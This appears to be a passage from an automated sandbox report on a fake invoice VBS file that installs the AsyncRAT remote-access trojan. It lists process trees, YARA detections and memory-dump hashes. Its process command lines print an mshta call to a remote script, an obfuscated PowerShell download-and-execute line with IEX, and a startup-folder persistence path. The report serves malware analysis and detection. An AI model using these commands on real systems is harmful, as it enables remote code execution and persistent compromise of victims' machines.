                                                              • Subject: CN=*.us.archive.org, OU=Domain Control Validated; Issuer: CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US; Not Before: Mon Dec 23 14:16:32 CET 2019; Not After: Mon Feb 21 23:56:17 CET 2022
                                                              • Subject: CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US; Issuer: CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US; Not Before: Tue May 03 09:00:00 CEST 2011; Not After: Sat May 03 09:00:00 CEST 2031
                                                              • Subject: CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US; Issuer: OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US; Not Before: Wed Jan 01 08:00:00 CET 2014; Not After: Fri May 30 09:00:00 CEST 2031
                                                              • Subject: OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US; Issuer: OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US; Not Before: Tue Jun 29 19:06:20 CEST 2004; Not After: Thu Jun 29 19:06:20 CEST 2034

                                                              Code Manipulations

                                                              Statistics

                                                              CPU Usage

                                                              Memory Usage

                                                              High Level Behavior Distribution

                                                              Behavior

                                                              System Behavior

                                                              General

                                                              Start time:19:17:59
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice-ID-(882451).vbs'
                                                              Imagebase:0x7ff79a710000
                                                              File size:163840 bytes
                                                              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:19:18:00
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\System32\mshta.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Windows\System32\mshta.exe' http://ahmedadel.work/cairo/Encoding.txt
                                                              Imagebase:0x7ff7693f0000
                                                              File size:14848 bytes
                                                              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              General

                                                              Start time:19:18:02
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                                              Imagebase:0x7ff7bedd0000
                                                              File size:447488 bytes
                                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp, Author: Florian Roth
                                                              Reputation:high

                                                              General

                                                              Start time:19:18:03
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff724c50000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:19:18:25
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                              Imagebase:0xa90000
                                                              File size:13312 bytes
                                                              MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              General

                                                              Start time:19:18:26
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\Microsoft.ps1
                                                              Imagebase:0x1030000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000005.00000003.745729144.0000000005ADD000.00000004.00000001.sdmp, Author: Florian Roth
                                                              • Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000005.00000002.906772895.0000000006182000.00000004.00000001.sdmp, Author: Florian Roth
                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.913434202.000000000B780000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000003.745955068.0000000005B56000.00000004.00000001.sdmp, Author: Joe Security
                                                              Reputation:high

                                                              General

                                                              Start time:19:18:26
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff724c50000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:19:18:28
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
                                                              Imagebase:0x7ff7bedd0000
                                                              File size:447488 bytes
                                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              General

                                                              Start time:19:18:31
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:#cmd
                                                              Imagebase:0x150000
                                                              File size:55400 bytes
                                                              MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              General

                                                              Start time:19:18:31
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:#cmd
                                                              Imagebase:0x930000
                                                              File size:55400 bytes
                                                              MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                              Reputation:moderate

                                                              General

                                                              Start time:19:18:53
                                                              Start date:27/02/2021
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:#cmd
                                                              Imagebase:0xe60000
                                                              File size:55400 bytes
                                                              MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                              Reputation:moderate

                                                              Disassembly

                                                              Code Analysis

                                                                Executed Functions

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000003.641926399.0000024D52410000.00000010.00000001.sdmp, Offset: 0000024D52410000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                • Instruction ID: 1aac2b9b7e82593c9b295db5398be495c09bbe1ee06e05d5652c4d7508fc696e
                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                • Instruction Fuzzy Hash: 1D90020449540655D41412910C4B36C60406398190FD45480981794144D88D029A1652
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Executed Functions

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.920262077.00007FFA372C0000.00000040.00000001.sdmp, Offset: 00007FFA372C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6b0301d36d5c1e5a1c1ea27d2f85bf35215072f9cea4db952ec129761b67db25
                                                                • Instruction ID: 30fd7f04c38e897809e8e875619b9224520c52c11d6f220bf449e7fc0c275e65
                                                                • Opcode Fuzzy Hash: 6b0301d36d5c1e5a1c1ea27d2f85bf35215072f9cea4db952ec129761b67db25
                                                                • Instruction Fuzzy Hash: 886109A2A0DB474FF7B993A858531B876D1EF63214B4880BED04ECB5D3ED1AAC019381
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.920174595.00007FFA37200000.00000040.00000001.sdmp, Offset: 00007FFA37200000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 56a9b8e4566bf6f84b624c246b5f978888754924194cdcff68a75f24c67afdce
                                                                • Instruction ID: 65335f94f5c0e5715314e298b280c929656d56bb2192221746c72ba1042a7515
                                                                • Opcode Fuzzy Hash: 56a9b8e4566bf6f84b624c246b5f978888754924194cdcff68a75f24c67afdce
                                                                • Instruction Fuzzy Hash: 6251053190CA494FD314DB58D8546A9FBE2FF96310F0486BAE04DC72A2DE29E945C792
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.920262077.00007FFA372C0000.00000040.00000001.sdmp, Offset: 00007FFA372C0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f983c2d1a1223250db12e8968d19f368f94b74b61b0fe4228f08db7b5b47da27
                                                                • Instruction ID: cb33d8ab28f8f921b505785827c5ac03dea175cf8e2e05c8fcc376471cc6c7d4
                                                                • Opcode Fuzzy Hash: f983c2d1a1223250db12e8968d19f368f94b74b61b0fe4228f08db7b5b47da27
                                                                • Instruction Fuzzy Hash: 1821D8A2F1DB474FE7B993A8585607866D1EF67324B5881BAD00DCB1D3FD1AAC019341
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
• Source File: 00000002.00000002.920262077.00007FFA372C0000.00000040.00000001.sdmp, Offset: 00007FFA372C0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7ecdc9ac9ed107ed0ed9114147b93b0df6762992ec3faf55c1b382ba6a558c16
• Instruction ID: 963be76d1fc8cac864d146f66a4f35a020b58e1e49b437767d844cbbe98e288e
• Opcode Fuzzy Hash: 7ecdc9ac9ed107ed0ed9114147b93b0df6762992ec3faf55c1b382ba6a558c16
• Instruction Fuzzy Hash: 4F11D322E0DB8A4FE7B5A3B81C651B8AAD1EF66210B5C80FAD54DC7293ED0A5C058351
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.920174595.00007FFA37200000.00000040.00000001.sdmp, Offset: 00007FFA37200000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ed8890beddf27766c38e155016bafab79a9a257ddc3aca3a341e25aaf7ae77e
• Instruction ID: a601953fa79b24423f0211eef3dcc9c52f819a95e96f3cb5b3784e796d61baae
• Opcode Fuzzy Hash: 0ed8890beddf27766c38e155016bafab79a9a257ddc3aca3a341e25aaf7ae77e
• Instruction Fuzzy Hash: 2F01D63131CA084BEB4DAA5CA4925B477D1EB96360B6040AED84ACB297DC22FC838781
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.920174595.00007FFA37200000.00000040.00000001.sdmp, Offset: 00007FFA37200000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f96e2c40b7d40e547dd598c6f53c6a9b7156275dd0848324181b3c8fecdd3c86
• Instruction ID: 8e14a0c93c4ca9cb14ada6454d3fef9f3655770558e79b8f32774b4850eaf99a
• Opcode Fuzzy Hash: f96e2c40b7d40e547dd598c6f53c6a9b7156275dd0848324181b3c8fecdd3c86
• Instruction Fuzzy Hash: 5001447115CB084FDB44EF0CE451AB6B7E0FB95364F10056EE58AC3661DA26E891CB45
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Memory Dump Source
• Source File: 00000002.00000002.920174595.00007FFA37200000.00000040.00000001.sdmp, Offset: 00007FFA37200000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b00821c0eda7e5111c446c8244bba22c239c5a1bed3e6340879ba105a506ae6
• Instruction ID: 7c12be019fa898d56296ebd560ec352c58b65603f8a6369decf841acdc8f528f
• Opcode Fuzzy Hash: 3b00821c0eda7e5111c446c8244bba22c239c5a1bed3e6340879ba105a506ae6
• Instruction Fuzzy Hash: F1424B31A0CB4A4FE369DBA89445675F7D1EF46310F14C57FD08EC7596EE2AB8828390
Uniqueness

Uniqueness Score: -1.00%

Executed Functions

Memory Dump Source
• Source File: 00000004.00000003.693120683.0000000005F50000.00000010.00000001.sdmp, Offset: 05F50000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
• Instruction ID: 48bbdcb85228a6cff182476d488c47a598f7e3bc30bf842b6935cf8546523e83
• Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
• Instruction Fuzzy Hash:
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Executed Functions

Strings
Memory Dump Source
• Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
Similarity
• API ID:
• String ID: Sb
• API String ID: 0-3592133247
• Opcode ID: 164110244ee94bbb76fd67f98a03f598f81ca11c37569151bbab230340fecfc1
• Instruction ID: 7addb2a7a5cff590afe6cb488a95b4c17fe7bf8439130a11c5c1c114495556b7
• Opcode Fuzzy Hash: 164110244ee94bbb76fd67f98a03f598f81ca11c37569151bbab230340fecfc1
• Instruction Fuzzy Hash: 9F0333B590011C8FDB65DB60C898B9E77B6AF96308F3145E9C00E9B262DF31DE858F91
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
Similarity
• API ID:
• String ID: Sb
• API String ID: 0-3592133247
• Opcode ID: 272677cf66961a1ac9fb4ad7bfa4dabc2f9f1f8b4330a7cc045516f99d220fe4
• Instruction ID: 993f179fbe826aac4594f812a3ce7bcf0d55753f9fe2dbf7a2efb1046273df9a
• Opcode Fuzzy Hash: 272677cf66961a1ac9fb4ad7bfa4dabc2f9f1f8b4330a7cc045516f99d220fe4
• Instruction Fuzzy Hash: 3F0322B590011C8FDB65DB60C898B9E77B6AF96308F3145E9C00EA7262DF31DE858F91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: be2fa45e3681e4a7dcc4f63878262e8d8e9f366387c58bfa4fa3079fb85c7ba8
• Instruction ID: 489b138bbd888f3657c8976b8b300fe3bfafd044f50eae7c4c816b8ee28d9214
• Opcode Fuzzy Hash: be2fa45e3681e4a7dcc4f63878262e8d8e9f366387c58bfa4fa3079fb85c7ba8
• Instruction Fuzzy Hash: 60B26FF5A10219BFDB24DB64CC91BADB7F2EF89704F048499E519AB391CE30AD849F50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b5acd3a376b5c18fc2d89143077b1ef07c131e52b145635bca67da6ab0899f2e
• Instruction ID: 03487a0c8e6c81cb7e719b2ed16a70e6dc88132232d24fdda0792daf948d28cd
• Opcode Fuzzy Hash: b5acd3a376b5c18fc2d89143077b1ef07c131e52b145635bca67da6ab0899f2e
• Instruction Fuzzy Hash: 5742A434A00259CFEB24DB64CC54BADB7B2EF89304F1085A9D9097B3A5DF71AD819F90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48c5aebf495c9a9e527b16806cec3f91ffd406f0a77f8c7550d706b4fc0dfb42
• Instruction ID: 3608cc07729aa7eb62a3f11105e0528532ad1cc44d52b21f0e71edbe3f94d8c0
• Opcode Fuzzy Hash: 48c5aebf495c9a9e527b16806cec3f91ffd406f0a77f8c7550d706b4fc0dfb42
• Instruction Fuzzy Hash: E9C19D302006058FE714EB74D894A9EB7E3EFC621DB158D68C5058B6B6DF75FD098BA0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e97dd1a4a8537e14fc2aa39ce86a9cf7a8516e3a3dc33ae66f37cf889f9a7119
• Instruction ID: 3c1f92c87acd2c453b9a52f429167c5d2b6eb1e2a701c333d7935395187ad82f
• Opcode Fuzzy Hash: e97dd1a4a8537e14fc2aa39ce86a9cf7a8516e3a3dc33ae66f37cf889f9a7119
• Instruction Fuzzy Hash: F6A180B4600306CFE719DF34C4587AEBBF2AF89308F148569D8119B3A5CB75D985CB90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
Similarity
• API ID:
• String ID: /
• API String ID: 0-2043925204
• Opcode ID: a44a72866b040928bc21202dc18b211b57f4312838604f0f702d3249dfa23033
• Instruction ID: 25c0d26c0530636e9df5e8c362bdea1a4cc90cfb78528824bfc130e58ff29a3b
• Opcode Fuzzy Hash: a44a72866b040928bc21202dc18b211b57f4312838604f0f702d3249dfa23033
• Instruction Fuzzy Hash: 2E0292F0B002069FDB14EF64C4946AEB6F6EF85248F188869D606DB3B1DF74DD068B91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.910167041.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 7f66773cdcd9770ec373cbb02e8ad1908d240de0f349d3b61bfc990d8c18d0cf
• Instruction ID: b1e4c6e4fd17203b0847cf16cbbe3190fb429cadc74462cd55e5437fcc4ff45a
• Opcode Fuzzy Hash: 7f66773cdcd9770ec373cbb02e8ad1908d240de0f349d3b61bfc990d8c18d0cf
• Instruction Fuzzy Hash: 2741A2B1A00209AFDB10DFA8D845BDEFFB5FF48314F15816AE505AB381DB749941CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0810F767,00000000,00000000,00000003,00000000,00000002), ref: 0810F872
Memory Dump Source
• Source File: 00000005.00000002.910167041.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 890c4cbcb5cc66ae3e786bda26bee7063328deb21861f322f05616a79f6e72cc
• Instruction ID: 958ff4053ce8df8c89ba12b5fd1ae67139ea8ed71ef1e0a69a623752aa8f2e84
• Opcode Fuzzy Hash: 890c4cbcb5cc66ae3e786bda26bee7063328deb21861f322f05616a79f6e72cc
• Instruction Fuzzy Hash: 002145B2C00209AFCB10CF99D845ADEFBB4FF08324F00812AE915B3650D774A950CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0810F767,00000000,00000000,00000003,00000000,00000002), ref: 0810F872
Memory Dump Source
• Source File: 00000005.00000002.910167041.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 6a3b38c6d887e7674ccd2fcd0ee456ad0e85fca925225f9b2cd2f2128330243e
• Instruction ID: 26b079e79b8c9f25314e97df31e3424aa42cfae59d1135104caa23577d5d8508
• Opcode Fuzzy Hash: 6a3b38c6d887e7674ccd2fcd0ee456ad0e85fca925225f9b2cd2f2128330243e
• Instruction Fuzzy Hash: 372125B1D00219AFCB10CF99D884ADEFBB4FF08314F10812AE915A7650DB75A954CFA5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c55c2213730f929aa4214a24343bb0ccc9498c98346e37c47fb4430c30cbb4f6
• Instruction ID: 7a77cfb0dfde436ddffcfe95187058a596635aab1c2f37625c5d9a3588ba6a34
• Opcode Fuzzy Hash: c55c2213730f929aa4214a24343bb0ccc9498c98346e37c47fb4430c30cbb4f6
• Instruction Fuzzy Hash: 538248B4A10255DFDB21DBB4C884A6DB7B2FF49304F288559E6019B366DB35EC82CF50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 55070a9c11a7d64eeb19b35cb5a0a684bb2fab07f6c9b9c36909d369d73d881f
• Instruction ID: 291ad5b92f66869a55e7989ae11052933fcd7830cc42ec120f71aab6c4c55810
• Opcode Fuzzy Hash: 55070a9c11a7d64eeb19b35cb5a0a684bb2fab07f6c9b9c36909d369d73d881f
• Instruction Fuzzy Hash: B2126A74B00204DFDB14DB68D564AADBBF2EF89215F2541A9E402EB3A5CB31ED41CFA0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 386fd4ba5d412004e2a98c4b235252c53016a57ea4031ed05f65be1a17607c73
• Instruction ID: 43db11d7392994037885551c45646ebb8e8e352ada5443d7846e00acd5aa5c5c
• Opcode Fuzzy Hash: 386fd4ba5d412004e2a98c4b235252c53016a57ea4031ed05f65be1a17607c73
• Instruction Fuzzy Hash: 34F1AF74700204CFDB24DB68C894A6EB7F2EF88215B19896CD9069B3A5DF35EC41CFA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 74056dee09a958d7de89ebb7e957384614bc77900ff27c42fd3fe88ef88dcca6
• Instruction ID: 9dcd5b6f043bcb1e4b55ef488a008571d62f3bdd16d3c9d1ab6017fa242e4687
• Opcode Fuzzy Hash: 74056dee09a958d7de89ebb7e957384614bc77900ff27c42fd3fe88ef88dcca6
• Instruction Fuzzy Hash: ECE14C30A002488FE710DBA4D058BAE7BF3EF86309F55C469D0055F2B6DB35EC469B65
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5bfcd1a89894d1e0c8e6effb3bfaa3f99f6ef715f859edea2dea8766832b8397
• Instruction ID: ce9df537a84561acf092e9fb98c471c0c67ffebbf064f6f6048c07de485d4c33
• Opcode Fuzzy Hash: 5bfcd1a89894d1e0c8e6effb3bfaa3f99f6ef715f859edea2dea8766832b8397
• Instruction Fuzzy Hash: 0ED13A79600109DFCB25CFA4C88899D7BB6EF88355B214269EA069B375CB30ED81DF90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 731add502a435899a39e4303aa68b06f14dc1c3d021b9e62454b24b959679983
• Instruction ID: db82d0138b8c3008807fd2a41cff649e84d23025bbb90b81ec539b4d3236562c
• Opcode Fuzzy Hash: 731add502a435899a39e4303aa68b06f14dc1c3d021b9e62454b24b959679983
• Instruction Fuzzy Hash: 28D18F74E00209DFDB05DFA4C454AADBBF2EF89308F158869D805AB3A5DB35ED45CBA0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e5090444e42603f5a6dcdd4b3ca43f8e92eff6ca2c9798c32d5ee6f4085259f
• Instruction ID: 5f44956cbfc066a9ebc78727117ed1c277b047eaa4c55b267cfe6dccd1a6e121
• Opcode Fuzzy Hash: 4e5090444e42603f5a6dcdd4b3ca43f8e92eff6ca2c9798c32d5ee6f4085259f
• Instruction Fuzzy Hash: 35A1B0757002408FD709AB78C858A2E7BB7EFC9615B15806DD50ADB3A2CF35AC02DBA5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 18d4173e595eeba359052a1f8fc9632523c158d7ac3a38a7f560e9e228f6d363
• Instruction ID: a114f62c95147a2f5db0299a3df6358357c8a7227d6ff129155f60d93ff2df34
• Opcode Fuzzy Hash: 18d4173e595eeba359052a1f8fc9632523c158d7ac3a38a7f560e9e228f6d363
• Instruction Fuzzy Hash: A1B1BD747002059FE704EB74D494BAE7BF3EF89308F258869D50A9B3A1DF75AD018BA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9102dd59e2fab68a3a2c8d2727ab19eef6c6f96db869e4335d53d3e1da1743f9
• Instruction ID: 61e5b16f47626753cce1e13e847e6eadce4f29b78deff741933d6f05cfb4b4ab
• Opcode Fuzzy Hash: 9102dd59e2fab68a3a2c8d2727ab19eef6c6f96db869e4335d53d3e1da1743f9
• Instruction Fuzzy Hash: 3CA182B4A102158FDB18DB75C4947AE7BF1AF86304F19C82DD606AB3A0DF38D841CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: da83ee9e206abe1800f812cbb45c0261f3dcc11625a6d2ef4c7faea97efa61b8
• Instruction ID: c9baf61a35c15033b94d7e7c81ed3e6693dd02d1f06b17ca9c3a40e7a3df0dde
• Opcode Fuzzy Hash: da83ee9e206abe1800f812cbb45c0261f3dcc11625a6d2ef4c7faea97efa61b8
• Instruction Fuzzy Hash: 2691C071B002448FD704DB68C058B6EBBF69F8A209F29C4A9D409DB3B6CF31DD4697A1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
